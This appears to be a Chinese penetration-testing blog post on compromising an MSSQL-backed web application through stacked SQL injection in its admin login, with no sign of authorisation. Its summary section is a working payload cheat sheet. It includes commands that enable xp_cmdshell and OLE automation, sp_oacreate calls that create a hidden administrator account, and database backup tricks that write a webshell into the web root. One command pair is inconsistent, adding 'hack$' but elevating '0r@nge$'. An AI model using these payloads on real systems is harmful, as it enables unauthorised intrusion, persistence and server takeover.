記一次堆疊注入拿shell的總結

0x03 滲透過程

前臺的頁面，首先懟一波弱口令

其實有幾個是可以弱口令直接進後臺的，但是後臺沒有任何的getshell點

那就只能在後臺的登入視窗試一試有沒有注入了，抓包測試一下

發現有注入點，直接上sqlmap一把梭，直接出了mssql 資料庫，而且是堆疊注入。

這裡想直接 --os-shell，想起來堆疊注入後面的語句是沒有回顯的，再換個思路。

ping 下 dnslog 看看是否可以直接執行命令，看來是可以執行命令的

再換個思路，嘗試用xp_cmdshell，手工開啟xp_cmdshell ,發現函式沒有被禁用 ,可以執行命令

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

嘗試直接注入cs的powershell上線，好傢伙，直接上線 ，看來函式沒有被禁用

EXEC master..xp_cmdshell’免殺powershell命令’

甜土豆提權到system

連xp_cmdshell命令都沒有禁用，想來也不會有什麼殺軟。

首先看了一下程式，emmm 那麼多powershell程式......沒有啥玩的必要了。可以嘗試溯源一波，下篇文章發。

也沒有內網，收工。

0x03 總結

EXEC sp_configure 'show advanced options', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user hack$ 0r@nge /add';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 0r@nge$ /add';

資料庫存在注入使用者具有讀寫許可權，一般至少DBO許可權有網站的具體路徑站庫不分離

1.修改資料庫為還原模式(恢復模式)：;alter database 庫名 set RECOVERY FULL –-2.建表和欄位;create table orange(a image)--3.備份資料庫;backup log 資料庫名 to disk = ‘c:\www\0r@nge1.bak’ with init –4.往表中寫入一句話;insert into orange(a) values (0x...)--    //值要進行hex進位制轉換下5.利用log備份到web的物理路徑;backup log 資料庫名 to disk = 'c:\www\0r@nge2.php' with init--6.刪除表;Drop table orange--

有網站具體路徑有可寫許可權(dbo許可權以上)站庫不分離

1.備份資料庫;backup database 資料庫名 to disk = 'C:\www\\...' with init --2.建立表格%';create table orange(a image) --3.寫入webshell%';insert into orange(a) values (0xxxxx) --4.進行差異備份%';backup log 資料庫名 to disk = 'C:\www\orange.asp'  WITH DIFFERENTIAL,FORMAT;--5.刪除表;Drop table orange--